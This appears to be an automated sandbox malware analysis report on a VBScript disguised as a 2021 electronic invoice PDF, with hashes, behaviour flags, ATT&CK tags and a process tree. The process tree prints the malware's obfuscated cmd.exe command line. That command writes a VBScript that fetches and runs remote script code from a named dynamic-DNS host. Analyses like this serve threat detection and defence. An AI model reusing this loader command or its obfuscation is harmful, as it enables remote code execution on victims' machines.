93955df34d7898b3e184ed2cd3f71fe6d5974bedd24b256b6001f595bd6e8eca

General

Target

Factura__Pdf__Electrónica__2021__SRFQRBLCNOEVZZBMZMOMOUYJGZEGOIAWE.vbs
Size

55KB
MD5

72913455b3df3773c5ee605662447542
SHA1

e71e9d4f382b468a8545827367fb8220a8b43e2c
SHA256

93955df34d7898b3e184ed2cd3f71fe6d5974bedd24b256b6001f595bd6e8eca
SHA512

cea75a82da862afaf6f8264abbc29fb92a7b29042b3a999ad0d64cdd782d2dccb27da6b692f99e726646c0d8e3924fab13131441a8c0f7aceb23324fe638246e

Score

8^/10

Blocklisted process makes network request 4 IoCs

Processes:

WScript.exe

flow pid process

7 1480 WScript.exe
8 1480 WScript.exe
9 1480 WScript.exe
10 1480 WScript.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 15 IoCs

Processes:

WScript.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1836 wrote to memory of 1156	1836	WScript.exe	cmd.exe
PID 1836 wrote to memory of 1156	1836	WScript.exe	cmd.exe
PID 1836 wrote to memory of 1156	1836	WScript.exe	cmd.exe
PID 1156 wrote to memory of 1788	1156	cmd.exe	cmd.exe
PID 1156 wrote to memory of 1788	1156	cmd.exe	cmd.exe
PID 1156 wrote to memory of 1788	1156	cmd.exe	cmd.exe
PID 1156 wrote to memory of 1748	1156	cmd.exe	cmd.exe
PID 1156 wrote to memory of 1748	1156	cmd.exe	cmd.exe
PID 1156 wrote to memory of 1748	1156	cmd.exe	cmd.exe
PID 1748 wrote to memory of 1792	1748	cmd.exe	cmd.exe
PID 1748 wrote to memory of 1792	1748	cmd.exe	cmd.exe
PID 1748 wrote to memory of 1792	1748	cmd.exe	cmd.exe
PID 1792 wrote to memory of 1480	1792	cmd.exe	WScript.exe
PID 1792 wrote to memory of 1480	1792	cmd.exe	WScript.exe
PID 1792 wrote to memory of 1480	1792	cmd.exe	WScript.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Factura__Pdf__Electrónica__2021__SRFQRBLCNOEVZZBMZMOMOUYJGZEGOIAWE.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1836
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /V/D/c "SEt NS2=.vb&&SEt a8230= ry402 =sbs073 ^"scsbs073risbs073ptsbs073:^": f7qwkk78 =sbs073 ^"hsbs073TtPssbs073:^": Gsbs073etsbs073Objsbs073ecsbs073t(sbs073ry402+f7qwkk78+^"&&sET sbs073=ihr21ihr21mut4h.gotdns.ch/p2.php^")&&sEt/^p h5p35="%a8230:sbs073=%%sbs073:ihr21=/%"<nul > C:\Users\Public\^udd44%NS2%s|start cmd /c start C:\Users\Public\^udd44%NS2%s"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" sEt/p h5p35="%a8230:sbs073=%%sbs073:ihr21=/%" 0<nul 1>C:\Users\Public\udd44%NS2%s"
    3⤵
    PID:1788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" start cmd /c start C:\Users\Public\udd44%NS2%s "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1748
  - - C:\Windows\system32\cmd.exe
      cmd /c start C:\Users\Public\udd44.vbs
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1792
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Public\udd44.vbs"
        5⤵
        Blocklisted process makes network request
        
        PID:1480

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

C:\Users\Public\udd44.vbs

MD5
d0991d5a2435330753466e9f814747f5

SHA1
5e873187ba802c0337955510d7ff930144312e24

SHA256
28ae38140132e8ca64eda3a1b35c37e7502ae0c8133b21488e543e7b3eed88b1

SHA512
23fb7d9e29819da7d97698ffbaf5723b03f6f50bcc92c1a2d41f0f5dbfc5f5ebb653822119e7bf3ce6bcc73c0c33172a8456ae232aec277aa68502bb7583cd4c

Download Submit
memory/1156-60-0x0000000000000000-mapping.dmp

Download
memory/1480-66-0x0000000000000000-mapping.dmp

Download
memory/1748-62-0x0000000000000000-mapping.dmp

Download
memory/1788-61-0x0000000000000000-mapping.dmp

Download
memory/1792-63-0x0000000000000000-mapping.dmp

Download
memory/1836-59-0x000007FEFBB41000-0x000007FEFBB43000-memory.dmp

Filesize
8KB

Download